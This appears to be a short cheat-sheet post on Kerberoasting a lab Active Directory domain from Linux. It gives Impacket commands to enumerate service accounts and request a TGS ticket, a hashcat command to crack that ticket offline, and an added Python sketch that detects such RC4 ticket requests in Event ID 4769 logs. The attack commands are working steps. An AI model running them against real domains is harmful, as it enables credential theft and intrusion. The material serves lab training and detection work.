Kerberoasting from Linux Machine


Install Impacket
python3 -m pipx install impacket
List all SPN Accounts
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev
Requesting a Single TGS ticket
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev -request-user SAPService -outputfile sap_tgs
Cracking the Ticket Offline with Hashcat
hashcat -m 13100 sap_tgs /usr/share/wordlists/rockyou.txt --force
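Each service ticket request above is logged on the domain controller as Event ID 4769, and hashcat mode 13100 applies to RC4 (etype 23) tickets, so RC4 requests for user-backed SPNs are the signal to hunt for. The following detection sketch is an added example, not part of the original post; the event field names, the sample records, the watchlist and the threshold are assumptions made for illustration.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: the ticket type hashcat mode 13100 works on

# Constructed sample of Event ID 4769 records, reduced to the fields used here.
# Only "sqldev" and "SAPService" come from the page; every other name is made up.
SAMPLE_EVENTS = [
    {"id": 4769, "account": "sqldev", "service": "SAPService", "etype": "0x17"},
    {"id": 4769, "account": "sqldev", "service": "svc-example-sql", "etype": "0x17"},
    {"id": 4769, "account": "sqldev", "service": "svc-example-web", "etype": "0x17"},
    {"id": 4769, "account": "alice-example", "service": "FILE01$", "etype": "0x12"},
    {"id": 4769, "account": "alice-example", "service": "svc-example-web", "etype": "0x12"},
    {"id": 4769, "account": "bob-example", "service": "SAPService", "etype": "0x17"},
    {"id": 4768, "account": "bob-example", "service": "krbtgt", "etype": "0x12"},
]


def is_rc4_user_spn_request(event):
    """True for a 4769 event issuing an RC4 ticket for a user-backed service."""
    if event.get("id") != 4769:
        return False
    service = event.get("service", "")
    # Machine accounts end in "$" and krbtgt is the KDC itself: neither has a
    # human-chosen password, so they are excluded as noise.
    if not service or service.endswith("$") or service.lower() == "krbtgt":
        return False
    return int(event.get("etype", "0x0"), 16) == RC4_HMAC


def find_suspects(events, watchlist=(), threshold=3):
    """Map account -> services for RC4 requests that look like kerberoasting."""
    # Reported: RC4 tickets for >= threshold distinct services (SPN sweep), or
    # for any service on the watchlist (single targeted request, e.g. a decoy).
    watched = {name.lower() for name in watchlist}
    requested = defaultdict(set)
    for event in events:
        if is_rc4_user_spn_request(event):
            requested[event["account"]].add(event["service"])
    return {
        account: sorted(services)
        for account, services in requested.items()
        if len(services) >= threshold or any(s.lower() in watched for s in services)
    }


if __name__ == "__main__":
    for account, services in find_suspects(SAMPLE_EVENTS, watchlist=["SAPService"]).items():
        print(f"{account}: RC4 service tickets for {', '.join(services)}")
```

Service accounts restricted to AES tickets no longer produce etype 0x17, which removes both the crackable ticket format used here and most of the noise in this check.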
Written by

RFS